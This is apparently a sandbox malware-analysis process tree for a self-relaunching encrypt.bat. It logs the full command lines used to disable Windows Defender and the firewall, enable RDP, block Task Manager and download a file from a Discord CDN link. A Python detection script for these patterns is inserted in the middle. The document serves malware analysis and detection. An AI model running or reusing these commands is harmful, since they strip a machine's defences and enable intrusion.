C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off12⤵PID:4432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"12⤵PID:620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"12⤵
- Command and Scripting Interpreter: PowerShell
PID:3052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"12⤵PID:888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"12⤵PID:4236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"12⤵PID:3888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"12⤵PID:1556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"12⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:4524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"12⤵
- Command and Scripting Interpreter: PowerShell
PID:1708 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"13⤵PID:4592
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"14⤵PID:1920
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f14⤵PID:3436
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"14⤵PID:4180
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f14⤵PID:4864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"14⤵PID:620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"14⤵PID:4904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"14⤵PID:1612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"14⤵PID:4936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"14⤵PID:1380
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable14⤵PID:4784
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE14⤵PID:4608
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off14⤵
- Modifies Windows Firewall
PID:3552
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off14⤵PID:4284
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off14⤵PID:4172
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off14⤵PID:4440
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off14⤵PID:4968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"14⤵PID:716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"14⤵PID:4168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"14⤵PID:4676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"14⤵PID:4244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"14⤵PID:3520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"14⤵
- Command and Scripting Interpreter: PowerShell
PID:888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"14⤵
- Blocklisted process makes network request
PID:4884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"14⤵
- Command and Scripting Interpreter: PowerShell
PID:1108 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"15⤵PID:2540
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"16⤵PID:4928
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f16⤵PID:1748
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"16⤵PID:4436
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f16⤵PID:4608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"16⤵PID:2744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"16⤵PID:3640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"16⤵PID:4956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"16⤵PID:1232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"16⤵
- Command and Scripting Interpreter: PowerShell
PID:2396
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable16⤵PID:1932
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE16⤵PID:3524
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off16⤵PID:4544
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off16⤵PID:1556
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off16⤵PID:4300
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off16⤵PID:700
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off16⤵PID:4932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"16⤵
- Command and Scripting Interpreter: PowerShell
PID:1088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"16⤵PID:2968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"16⤵PID:4572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"16⤵PID:4532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"16⤵PID:420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"16⤵PID:2848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"16⤵
- Blocklisted process makes network request
PID:2448
16⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs" | PID:1336 | Command and Scripting Interpreter: PowerShell
17⤵ C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat" | PID:2872
18⤵ C:\Windows\system32\reg.exe | reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" | PID:4580
18⤵ C:\Windows\system32\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f | PID:2732
18⤵ C:\Windows\system32\reg.exe | reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" | PID:3524
18⤵ C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f | PID:3872
18⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | PID:4656
18⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true" | PID:4016
18⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true" | PID:2916
18⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true" | PID:2988
18⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true" | PID:3900
18⤵ C:\Windows\system32\netsh.exe | netsh firewall set opmode disable | PID:2120
18⤵ C:\Windows\system32\netsh.exe | netsh firewall set opmode mode=DISABLE | PID:1828
18⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set currentprofile state off | PID:4984 | Modifies Windows Firewall
18⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set domainprofile state off | PID:4924
18⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set privateprofile state off | PID:2672
18⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set publicprofile state off | PID:328
18⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set allprofiles state off | PID:2004
18⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true" | PID:4508
18⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | PID:1836
18⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true" | PID:4616
18⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true" | PID:2052
18⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true" | PID:1460
18⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true" | PID:2780
18⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')" | PID:2684 | Blocklisted process makes network request
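The tree above is one pass of the loop encrypt.bat runs on every relaunch: tamper with Defender via Set-MpPreference, switch off every firewall profile, flip fDenyTSConnections to 0 and DisableTaskMgr to 1, pull a file from the Discord CDN, then start itself again with -Verb RunAs. The following Python is an added example, not part of this report or of the sample, that turns those observed command lines into detection rules for process-creation telemetry (Sysmon Event ID 1 or Security 4688 style) and measures how deep the RunAs relaunch chain has nested. The event list is constructed: the command lines and PIDs are taken from the tree, the parent links follow the depth markers, PID 999 stands in for the unseen root, and the ATT&CK technique IDs are my own mapping rather than anything the report states.

```python
"""Flag the defence-evasion command lines from this report in process-creation
telemetry and measure how deeply the encrypt.bat -> powershell -Verb RunAs
relaunch loop has nested. Added example; the events below are constructed."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# (rule name, ATT&CK technique as I map it, pattern over the full command line)
RULES = [
    ("defender_tamper", "T1562.001",
     re.compile(r"Set-MpPreference\s+-Disable\w+\s+\$true", re.I)),
    ("firewall_off", "T1562.004",
     re.compile(r"netsh\s+(advfirewall\s+set\s+\w+\s+state\s+off"
                r"|firewall\s+set\s+opmode\s+(mode=)?disable)", re.I)),
    ("rdp_enable", "T1112",
     re.compile(r'reg\s+add\s+.*Terminal Server.*fDenyTSConnections.*/d\s+"?0"?', re.I)),
    ("taskmgr_disable", "T1112",
     re.compile(r'reg\s+add\s+.*DisableTaskMgr.*/d\s+"?1"?', re.I)),
    ("webclient_download", "T1105",
     re.compile(r"WebClient\)\.DownloadFile\(", re.I)),
    ("runas_relaunch", "T1059.001",
     re.compile(r"Start-Process\s+'[^']+'\s+-Verb\s+RunAs", re.I)),
]


def classify(ev: ProcEvent) -> List[str]:
    """Names of every rule whose pattern matches the event's command line."""
    return [name for name, _tech, rx in RULES if rx.search(ev.cmdline)]


def download_url(ev: ProcEvent) -> Optional[str]:
    """First argument of a WebClient.DownloadFile call, for IoC extraction."""
    m = re.search(r"DownloadFile\('([^']+)'", ev.cmdline)
    return m.group(1) if m else None


def triage(events: List[ProcEvent]) -> Dict[str, int]:
    """Hit count per rule over a batch of events."""
    hits: Counter = Counter()
    for ev in events:
        hits.update(classify(ev))   # a list of names: each is counted once
    return dict(hits)


def relaunch_chain_length(events: List[ProcEvent]) -> int:
    """Largest number of RunAs relaunches on any single ancestor path.
    Real telemetry should key on Sysmon ProcessGuid rather than PID: this very
    report shows PIDs being recycled within one run."""
    by_pid = {ev.pid: ev for ev in events}
    relaunch = {ev.pid for ev in events if "runas_relaunch" in classify(ev)}
    longest = 0
    for ev in events:
        seen, count, cur = set(), 0, ev.pid
        while cur in by_pid and cur not in seen:   # walk towards the root
            seen.add(cur)
            count += cur in relaunch
            cur = by_pid[cur].ppid
        longest = max(longest, count)
    return longest


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
REG = r"C:\Windows\system32\reg.exe"
NETSH = r"C:\Windows\system32\netsh.exe"
RUNAS = r'''powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"'''
BAT = r'"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"'
MP = 'powershell -Command "Set-MpPreference -Disable{} $true"'

# Constructed sample: three nested encrypt.bat runs, parent PIDs following the
# tree's depth markers; 999 stands in for the root process not shown here.
# The download URL's signed query string is omitted for brevity.
SAMPLE = [
    ProcEvent(1336, 999, PS, RUNAS),
    ProcEvent(2872, 1336, CMD, BAT),
    ProcEvent(4580, 2872, REG, r'reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"'),
    ProcEvent(2732, 2872, REG, r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f'),
    ProcEvent(3872, 2872, REG, r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f'),
    ProcEvent(4656, 2872, PS, MP.format("IntrusionPreventionSystem")),
    ProcEvent(4508, 2872, PS, MP.format("RealtimeMonitoring")),
    ProcEvent(2120, 2872, NETSH, "netsh firewall set opmode disable"),
    ProcEvent(1828, 2872, NETSH, "netsh firewall set opmode mode=DISABLE"),
    ProcEvent(2004, 2872, NETSH, "netsh advfirewall set allprofiles state off"),
    ProcEvent(2684, 2872, PS, r'''powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg', 'C:\Users\Admin\Desktop\kill.jpg')"'''),
    ProcEvent(4108, 2872, PS, RUNAS),
    ProcEvent(3244, 4108, CMD, BAT),
    ProcEvent(2776, 3244, PS, MP.format("IOAVProtection")),
    ProcEvent(3944, 3244, PS, RUNAS),
]

if __name__ == "__main__":
    for ev in SAMPLE:
        print(f"{ev.pid:>5} {classify(ev) or '-'}")
    print("counts:", triage(SAMPLE))
    print("relaunch depth:", relaunch_chain_length(SAMPLE))
```

The rules deliberately match `reg add` and not the `reg query` that precedes each write, so the read-only probes in the tree produce no hits; in production the relaunch depth is the useful alerting signal, since a single `Start-Process -Verb RunAs` is ordinary administration but a chain of them under successive copies of the same .bat is not.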
18⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs" | PID:4108 | Command and Scripting Interpreter: PowerShell
19⤵ C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat" | PID:3244
20⤵ C:\Windows\system32\reg.exe | reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" | PID:1276
20⤵ C:\Windows\system32\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f | PID:3716
20⤵ C:\Windows\system32\reg.exe | reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" | PID:4512
20⤵ C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f | PID:4584
20⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | PID:2412
20⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true" | PID:2776
20⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true" | PID:4564
20⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true" | PID:4488
20⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true" | PID:1632
20⤵ C:\Windows\system32\netsh.exe | netsh firewall set opmode disable | PID:2848
20⤵ C:\Windows\system32\netsh.exe | netsh firewall set opmode mode=DISABLE | PID:1856
20⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set currentprofile state off | PID:2044
20⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set domainprofile state off | PID:4924
20⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set privateprofile state off | PID:1460
20⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set publicprofile state off | PID:1968
20⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set allprofiles state off | PID:2968
20⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true" | PID:2916
20⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | PID:1252
20⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true" | PID:5000
20⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true" | PID:700
20⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true" | PID:980
20⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true" | PID:2524
20⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')" | PID:4040 | Blocklisted process makes network request
20⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs" | PID:3944 | Command and Scripting Interpreter: PowerShell
21⤵ C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat" | PID:1920
22⤵ C:\Windows\system32\reg.exe | reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" | PID:4244
22⤵ C:\Windows\system32\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f | PID:3716
22⤵ C:\Windows\system32\reg.exe | reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" | PID:1384
22⤵ C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f | PID:440
22⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | PID:1856
22⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true" | PID:4516
22⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true" | PID:4784
22⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true" | PID:456
22⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true" | PID:3436
22⤵ C:\Windows\system32\netsh.exe | netsh firewall set opmode disable | PID:3256
22⤵ C:\Windows\system32\netsh.exe | netsh firewall set opmode mode=DISABLE | PID:2164 | Modifies Windows Firewall
22⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set currentprofile state off | PID:2872
22⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set domainprofile state off | PID:1088
22⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set privateprofile state off | PID:980
22⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set publicprofile state off | PID:3344
22⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set allprofiles state off | PID:1532
22⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true" | PID:3520
22⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | PID:4300
22⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true" | PID:4184
22⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true" | PID:2460
22⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true" | PID:1612
22⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true" | PID:3524 | Command and Scripting Interpreter: PowerShell
22⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')" | PID:772 | Blocklisted process makes network request
22⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs" | PID:3024 | Command and Scripting Interpreter: PowerShell | Modifies registry class
23⤵ C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat" | PID:1084
24⤵ C:\Windows\system32\reg.exe | reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" | PID:1108
24⤵ C:\Windows\system32\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f | PID:888
24⤵ C:\Windows\system32\reg.exe | reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" | PID:3716
24⤵ C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f | PID:1276
24⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | PID:4132
24⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true" | PID:4000
24⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true" | PID:4972
24⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true" | PID:2072
24⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true" | PID:532
24⤵ C:\Windows\system32\netsh.exe | netsh firewall set opmode disable | PID:4544
24⤵ C:\Windows\system32\netsh.exe | netsh firewall set opmode mode=DISABLE | PID:3708 | Modifies Windows Firewall
24⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set currentprofile state off | PID:2244
24⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set domainprofile state off | PID:4132
24⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set privateprofile state off | PID:2264 | Modifies Windows Firewall
24⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set publicprofile state off | PID:1792 | Modifies Windows Firewall
24⤵ C:\Windows\system32\netsh.exe | netsh advfirewall set allprofiles state off | PID:4884
24⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true" | PID:3152
24⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | PID:204
24⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true" | PID:420
24⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true" | PID:2488
24⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true" | PID:2164 | Command and Scripting Interpreter: PowerShell
24⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true" | PID:1336
24⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')" | PID:4488 | Blocklisted process makes network request
24⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs" | PID:4532 | Command and Scripting Interpreter: PowerShell
